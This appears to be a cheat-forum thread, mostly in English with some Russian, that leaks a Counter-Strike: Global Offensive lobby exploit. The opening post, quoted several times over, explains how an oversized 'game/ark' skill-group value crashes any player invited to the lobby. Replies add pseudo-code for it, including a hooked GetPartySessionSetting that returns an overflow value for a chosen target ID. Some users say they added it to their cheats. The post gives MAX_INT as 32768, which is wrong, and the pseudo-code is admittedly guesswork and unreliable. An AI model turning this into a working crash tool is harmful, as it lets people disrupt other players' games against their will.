Исходник Way to crash any csgo player

[expensive3]

Happy new year, a few months ago i started looking into csgo panorama source code and discovered a vulnerability that allows to crash any player knowing only his steamid, since some peoples started selling this, i decided to leak it.
Lets take a look at this code (panorama/scripts/friendlobby.js line 57)

    var _SetSkillGroup = function ( elTile, gameMode )
    {
        var skillGroup = PartyBrowserAPI.GetPartySessionSetting( _m_xuid, 'game/ark' );
        skillGroup = Math.floor( skillGroup/10 );
       
        var elSkillGroupImg = elTile.FindChildTraverse( 'JsFriendLobbySkillGroup' );

        var szSkillGroupType = "skillgroup";
        if ( gameMode === 'scrimcomp2v2' )
        {
            szSkillGroupType = 'wingman';
        }
        else if ( gameMode === 'survival' )
        {
            szSkillGroupType = 'dangerzone';
        }
       
        if( !skillGroup )
            elSkillGroupImg.AddClass( 'hidden' );
        else
        {
            elSkillGroupImg.RemoveClass( 'hidden' );
            elTile.FindChildTraverse( 'JsFriendLobbySkillGroup' ).SetImage( 'file://{images}/icons/skillgroups/' + szSkillGroupType + skillGroup +'.svg' );
        }
    };

This line of code will cause game to crash if skillGroup is greater than the MAX_INT(32768) value

elTile.FindChildTraverse( 'JsFriendLobbySkillGroup' ).SetImage( 'file://{images}/icons/skillgroups/' + szSkillGroupType + skillGroup +'.svg' );

You have to create lobby, fill game/ark meta key with some value greater than MAX_INT and multiply it by 10 due to this line of code

skillGroup = Math.floor( skillGroup/10 );

and invite player to this lobby.

 

[dhe55r]

Happy new year, a few months ago i started looking into csgo panorama source code and discovered a vulnerability that allows to crash any player knowing only his steamid, since some peoples started selling this, i decided to leak it.
Lets take a look at this code (panorama/scripts/friendlobby.js line 57)

    var _SetSkillGroup = function ( elTile, gameMode )
    {
        var skillGroup = PartyBrowserAPI.GetPartySessionSetting( _m_xuid, 'game/ark' );
        skillGroup = Math.floor( skillGroup/10 );
      
        var elSkillGroupImg = elTile.FindChildTraverse( 'JsFriendLobbySkillGroup' );

        var szSkillGroupType = "skillgroup";
        if ( gameMode === 'scrimcomp2v2' )
        {
            szSkillGroupType = 'wingman';
        }
        else if ( gameMode === 'survival' )
        {
            szSkillGroupType = 'dangerzone';
        }
      
        if( !skillGroup )
            elSkillGroupImg.AddClass( 'hidden' );
        else
        {
            elSkillGroupImg.RemoveClass( 'hidden' );
            elTile.FindChildTraverse( 'JsFriendLobbySkillGroup' ).SetImage( 'file://{images}/icons/skillgroups/' + szSkillGroupType + skillGroup +'.svg' );
        }
    };

This line of code will cause game to crash if skillGroup is greater than the MAX_INT(32768) value

elTile.FindChildTraverse( 'JsFriendLobbySkillGroup' ).SetImage( 'file://{images}/icons/skillgroups/' + szSkillGroupType + skillGroup +'.svg' );

You have to create lobby, fill game/ark meta key with some value greater than MAX_INT and multiply it by 10 due to this line of code

skillGroup = Math.floor( skillGroup/10 );

and invite player to this lobby.

cool

 

[SapDragon]

Happy new year, a few months ago i started looking into csgo panorama source code and discovered a vulnerability that allows to crash any player knowing only his steamid, since some peoples started selling this, i decided to leak it.
Lets take a look at this code (panorama/scripts/friendlobby.js line 57)

    var _SetSkillGroup = function ( elTile, gameMode )
    {
        var skillGroup = PartyBrowserAPI.GetPartySessionSetting( _m_xuid, 'game/ark' );
        skillGroup = Math.floor( skillGroup/10 );
      
        var elSkillGroupImg = elTile.FindChildTraverse( 'JsFriendLobbySkillGroup' );

        var szSkillGroupType = "skillgroup";
        if ( gameMode === 'scrimcomp2v2' )
        {
            szSkillGroupType = 'wingman';
        }
        else if ( gameMode === 'survival' )
        {
            szSkillGroupType = 'dangerzone';
        }
      
        if( !skillGroup )
            elSkillGroupImg.AddClass( 'hidden' );
        else
        {
            elSkillGroupImg.RemoveClass( 'hidden' );
            elTile.FindChildTraverse( 'JsFriendLobbySkillGroup' ).SetImage( 'file://{images}/icons/skillgroups/' + szSkillGroupType + skillGroup +'.svg' );
        }
    };

This line of code will cause game to crash if skillGroup is greater than the MAX_INT(32768) value

elTile.FindChildTraverse( 'JsFriendLobbySkillGroup' ).SetImage( 'file://{images}/icons/skillgroups/' + szSkillGroupType + skillGroup +'.svg' );

You have to create lobby, fill game/ark meta key with some value greater than MAX_INT and multiply it by 10 due to this line of code

skillGroup = Math.floor( skillGroup/10 );

and invite player to this lobby.

+реп отличный релиз, я тоже недавно подобный эксплоит нашёл, но немного в другой вещи.

 

[J4MBO]

u should keep this secret somehow. because people will recognize how to do it and they will start making this shit and valve will fix it.

 

[DeBchik]

Я попробовал сделать, но оно не работает
Значение реально меняется, но ни крашей, ничего вообщем.

 

[zzzzAesss]

thanks for this release +rep

 

[Digarov]

+rep спасибо, добавил себе в пасту, только крашит меня
блять, скоро уже наверное читы смогут акки пиздить, добавлять скин в инвентарь с возможностью продажи и т.д

 

[DOTNETISTRASH]

can somebody explain that?
"You have to create lobby, fill game/ark meta key with some value greater than MAX_INT and multiply it by 10 due to this line of code"

 

[laithcool]

can somebody explain that?
"You have to create lobby, fill game/ark meta key with some value greater than MAX_INT and multiply it by 10 due to this line of code"

you create a lobby then modify panorama lobby code to change skill group value first multiply by 10 to remove the /10 then add 40000 to it should go something like this

void crash_player()
{
    auto lobby = interface::getlobby();
    auto skillgroup = lobby->getskillgroup();
    
    lobby->setskillgroup = skillgroup * 10;
    lobby->setskillgroup = skillgroup + 40000; //idk if skill group is an int or a float lmao figure that out yourself or you can just multiply by 40000 if skill group is = or > 1
    
}

please note that the above code is just an example of the implementation that i wrote from my phone you need to hook certain stuff i think or however you edit panorama vars im not sure

 

[DOTNETISTRASH]

I understand the general meaning, thank you very much

 

[maecry]

you create a lobby then modify panorama lobby code to change skill group value first multiply by 10 to remove the /10 then add 40000 to it should go something like this

void crash_player()
{
    auto lobby = interface::getlobby();
    auto skillgroup = lobby->getskillgroup();
   
    lobby->setskillgroup = skillgroup * 10;
    lobby->setskillgroup = skillgroup + 40000; //idk if skill group is an int or a float lmao figure that out yourself or you can just multiply by 40000 if skill group is = or > 1
   
}

please note that the above code is just an example of the implementation that i wrote from my phone you need to hook certain stuff i think or however you edit panorama vars im not sure

no ur psuedo is wrong, very wrong imo

look at the friendlobby.js

var skillGroup = PartyBrowserAPI.GetPartySessionSetting( _m_xuid, 'game/ark' );

so we know that skillGroup is set by calling the GetPartySessionSetting,
now open IDA and find this function around client.dll hook it

int __fastcall hkGetPartySessionSetting( int xuid, const char* setting)
{
  if (xuid == targetXUid)
    return ( MAX_INT + 1 ) * 10
 else
  original_fn( arg... )
}

idk correct me tho cuz I'm retarded around 3am

 

[laithcool]

no ur psuedo is wrong, very wrong imo

look at the friendlobby.js

var skillGroup = PartyBrowserAPI.GetPartySessionSetting( _m_xuid, 'game/ark' );

so we know that skillGroup is set by calling the GetPartySessionSetting,
now open IDA and find this function around client.dll hook it

int __fastcall hkGetPartySessionSetting( int xuid, const char* setting)
{
  if (xuid == targetXUid)
    return ( MAX_INT + 1 ) * 10
else
  original_fn( arg... )
}

idk correct me tho cuz I'm retarded around 3am

ay man i literally said im not sure how this is done i literally wrote the psuedo from my phone and i havent looked into it at all so chill out

 

[maecry]

ay man i literally said im not sure how this is done i literally wrote the psuedo from my phone and i havent looked into it at all so chill out

all good dw its just me saying lol

 

[h4rmy ☆]

just wondering if this applies to the new surf/bhop game based on source with panorama momentum mod

 

[xenzah1337]

just wondering if this applies to the new surf/bhop game based on source with panorama momentum mod

What game are you talking about specifically? could be possible tho.

 

[h4rmy ☆]

What game are you talking about specifically? could be possible tho.

Пожалуйста, авторизуйтесь для просмотра ссылки.

you can apply to beta test, they usually accept in 2-3 days

 

[xenzah1337]

Пожалуйста, авторизуйтесь для просмотра ссылки.

you can apply to beta test, they usually accept in 2-3 days

looks interesting, reminds me of Kreedz Climbing

 

[h4rmy ☆]

looks interesting, reminds me of Kreedz Climbing

they are planning on adding kz maps aswell, for now there are surf, bhop, rocketjump, stickyjump, grenadejump, ahop (hl2 abh) and defrag whatever that is

 

[xenzah1337]

they are planning on adding kz maps aswell, for now there are surf, bhop, rocketjump, stickyjump, grenadejump, ahop (hl2 abh) and defrag whatever that is

sounds good imo